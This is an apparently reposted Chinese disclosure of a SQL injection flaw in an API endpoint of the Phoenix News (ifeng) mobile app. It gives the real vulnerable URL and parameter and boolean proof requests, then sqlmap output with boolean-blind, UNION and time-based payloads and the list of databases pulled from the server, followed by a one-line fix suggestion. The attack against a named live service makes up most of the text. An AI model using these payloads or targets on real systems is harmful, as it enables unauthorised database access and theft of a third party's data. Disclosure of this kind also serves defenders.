Home  >  Article  >  Database  >  凤凰网某应用sql注入漏洞_MySQL

凤凰网某应用sql注入漏洞_MySQL

WBOY
WBOYOriginal
2016-05-31 08:47:131029browse

凤凰网某应用sql注入漏洞

凤凰新闻手机app的一个api接口过滤不严,存在注入漏洞。

注入点:http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews&os=android_19&screen=720x1206&publishid=2011&zip=1,受影响参数:proid

证明:

http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews' and '12'='12&os=android_19&screen=720x1206&publishid=2011&zip=1 返回正常数据

http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews' and '22'='12&os=android_19&screen=720x1206&publishid=2011&zip=1 返回数据异常

 

sqlmap无压力,貌似凤凰汽车频道的库也在其中,

sqlmap identified the following injection points with a total of 50 HTTP(s) requests:

---

Place: GET

Parameter: proid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: gv=4.2.0&proid=ifengnews' AND 8025=8025 AND 'lqID'='lqID&os=android_19&screen=720x1206&publishid=2011&zip=1

Type: UNION query

Title: MySQL UNION query (NULL) - 14 columns

Payload: gv=4.2.0&proid=-6406' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7166717471,0x457a716d67506d734978,0x716d696471),NULL,NULL,NULL,NULL,NULL#&os=android_19&screen=720x1206&publishid=2011&zip=1

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: gv=4.2.0&proid=ifengnews' AND SLEEP(5) AND 'tWlX'='tWlX&os=android_19&screen=720x1206&publishid=2011&zip=1

---

[09:36:11] [INFO] the back-end DBMS is MySQL

web application technology: Nginx

back-end DBMS: MySQL 5.0.11

[09:36:11] [INFO] fetching database names

[09:36:11] [INFO] the SQL query used returns 5 entries

[09:36:11] [INFO] retrieved: "information_schema"

[09:36:11] [INFO] retrieved: "auto_ifeng"

[09:36:11] [INFO] retrieved: "auto_ifeng_2"

[09:36:11] [INFO] retrieved: "mobile_ifeng"

[09:36:12] [INFO] retrieved: "test"

available databases [5]:

[*] auto_ifeng

[*] auto_ifeng_2

[*] information_schema

[*] mobile_ifeng

[*] test

 

修复方案:

过滤,参数化

Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn